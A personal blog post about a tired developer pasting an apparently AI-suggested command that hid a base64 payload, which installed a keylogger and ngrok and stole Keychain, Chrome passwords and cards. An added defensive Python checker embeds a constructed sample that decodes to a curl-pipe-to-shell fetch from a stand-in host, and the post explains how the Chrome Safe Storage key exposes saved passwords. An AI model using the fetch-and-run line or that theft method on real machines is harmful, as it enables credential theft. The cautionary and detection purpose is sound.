Skimming an AI answer cost me 100 passwords – Always Draft
09 Jun, 2026
NB: This whole story is stupid. I was tired and stupid. I knew better, and this is an "it'll never happen to me, but it did" style of story.
I gave a talk[1] at an Anthropic event recently and I said to the audience "a special warning to the non-technical folks: never run a curl command you don't trust". During the Q&A I was asked why and I replied with a quick anecdote, but that it is actually a long story that needs a blog post. Since Mythos[2] launched today with its allegedly incredible cybersecurity skills, it seemed like a good time to write this up. So here it is:
The setup
It was around midnight and I was tired from a mixture of work, chores, and a newborn. If you hate sleep, I highly recommend this regimen:
Quit your executive job
Start a consulting company
Build software that solves your little problems and open source it (people log bugs they want fixed, who knew?)
Dust off your old "startup ideas list" and start building those too
Move house when your wife is 9 months pregnant(!)
Welcome the new baby (and keep your older children happy too)
Have one of your kids start kindergarten and all the emotion that comes with that.
9-9-6? Those are rookie numbers; follow my regime and you'll be running on a 5-12-7 clock. The whole week had been a blur and I was happy to be getting some productive work done, even though it wasn't good quality deep work. It was the kind of work that runs on autopilot and momentum. The kind where you've been at it long enough that you stop questioning yourself; it's muscle memory as you go through the motions, and the default is to reach for the path of least resistance.
I was fiddling with a project in Claude Code and kept running into a plugin issue across sessions. Reload wasn't working, and I kept tripping over env warnings. I was digging around trying to unhide hidden files to edit my configuration and troubleshoot. I was getting frustrated, which led me to this AI prompt:
"I want to unhide all the hidden files on my system. Go find me a terminal command." It came back with a few options and I clicked around the results. I was tired and I didn't want to read.
I glanced at the command to make sure it wasn't garbage… a few characters at the start, a few at the end. I didn't try hard. In retrospect I remember it looked weird, but didn't think it was dangerous. I was tired and I wanted to fix this one thing (just one teeny tiny little thing) and then go to bed.
This is the stupid part. Muscle memory kicked in (people who use Excel with no mouse or Vim will get it): I copied, pasted, and hit enter in milliseconds.
The command I ran was not the command I read.
My heart sank as soon as I saw the command expand in the terminal… It was now much longer. What I saw visually was not what was copied. Why is there a curl command in the middle there? What are all those random characters, is that base64? Holy shit.
Then a flicker in my browser tabs. A Chrome window popped up that I didn't launch and minimized itself near instantly.
I hesitated for a moment thinking I was tired, but I knew something was wrong. I ran a process check. Why is ngrok running? That tool creates a connection from my computer to somewhere remote and I had never used it before. Holy shit #2.
So I ran a quick grep to search for some of my passwords, starting with my local login. There it was, sitting in a plaintext file buried in a temp directory a few folders deep. Holy shit #3.
I'd opened the door to malware, invited it in, and now it was helping itself to all my passwords and credentials.
What it stole
The command I'd run contained a base64-encoded payload buried between the parts I'd actually read. Once decoded, it reached out to a domain registered 3 days earlier and pulled down a set of malicious scripts along with ngrok (a legitimate tunneling tool that attackers favor because it makes outbound traffic look unremarkable). By the time I noticed, the malware had been at it for maybe 15 minutes, keylogger installed and running. It took:
My macOS Keychain, the master key to everything else on the system
Auth tokens and API keys sitting in memory and config files
My password manager master password, my local login, and all keystrokes for that time period captured live through the keylogger
Everything stored in Chrome - roughly 100 passwords and 2 saved credit cards.
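The structure described above (a readable command at each end, a base64 blob in the middle that decodes to a curl-and-pipe-to-shell stage) is exactly what a quick pre-run check can surface. The following is an added example, not code from this post: a small inspector that takes a pasted command line, decodes any base64-looking tokens, and reports risky patterns found in either the visible text or the decoded layer, without executing anything. The sample command, the encoded blob and the example.invalid domain are all constructed for this illustration.

```python
import base64
import binascii
import re

# Constructed sample: a plausible "show hidden files" one-liner with a base64
# blob spliced into the middle. The blob decodes to a fetch-and-run stage that
# points at a reserved, non-resolving domain; nothing here contacts anything.
HIDDEN = base64.b64encode(b"curl -fsSL http://example.invalid/setup.sh | sh").decode()
SAMPLE_COMMAND = (
    "defaults write com.apple.finder AppleShowAllFiles -bool true; "
    f"echo {HIDDEN} | base64 -d | sh; "
    "killall Finder"
)

# Runs of base64 alphabet long enough that they are unlikely to be ordinary words.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Patterns a defender would want flagged before hitting enter.
RISKY_PATTERNS = {
    "remote-fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe-to-shell": re.compile(r"\|\s*(sh|bash|zsh|python3?|perl)\b"),
    "base64-decode": re.compile(r"base64\s+(-d|--decode|-D)\b"),
    "eval": re.compile(r"\beval\b"),
    "tunnel-tool": re.compile(r"\bngrok\b"),
}


def decode_blobs(command):
    """Return the decoded text of every base64-looking token that decodes cleanly to printable text."""
    decoded = []
    for match in B64_RE.finditer(command):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        text = raw.decode("utf-8", errors="replace")
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def inspect_command(command):
    """Return a sorted list of finding names for the visible command and any hidden base64 layers."""
    findings = set()
    layers = [command] + decode_blobs(command)
    for layer in layers:
        for name, pattern in RISKY_PATTERNS.items():
            if pattern.search(layer):
                findings.add(name)
    if len(layers) > 1:
        findings.add("hidden-base64-layer")
    return sorted(findings)


def head_and_tail(command, n=30):
    """What a skim actually shows you: the first and last n characters, plus the true length."""
    return command[:n], command[-n:], len(command)


if __name__ == "__main__":
    head, tail, length = head_and_tail(SAMPLE_COMMAND)
    print(f"skim sees: {head!r} ... {tail!r}  (actual length: {length} chars)")
    for blob in decode_blobs(SAMPLE_COMMAND):
        print("hidden layer decodes to:", blob)
    print("findings:", inspect_command(SAMPLE_COMMAND))
```

The point of `head_and_tail` is the one this story turns on: the two ends of the sample look like a harmless Finder tweak, and only the length and the decoded middle give the game away. A harmless command such as `ls -la ~` produces no findings at all.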
Chrome encrypts its saved passwords and card details with a key stored in the macOS Keychain, under an entry called Chrome Safe Storage. macOS normally prompts before another process can read it, so the malware either caught me approving a prompt while I was distracted, or wore me down with repeated requests until I clicked allow; I honestly don't remember. Either way, it got the key, and Chrome's password and credit card databases were readable in plain text, so it got those too.
A silver lining
Most of those...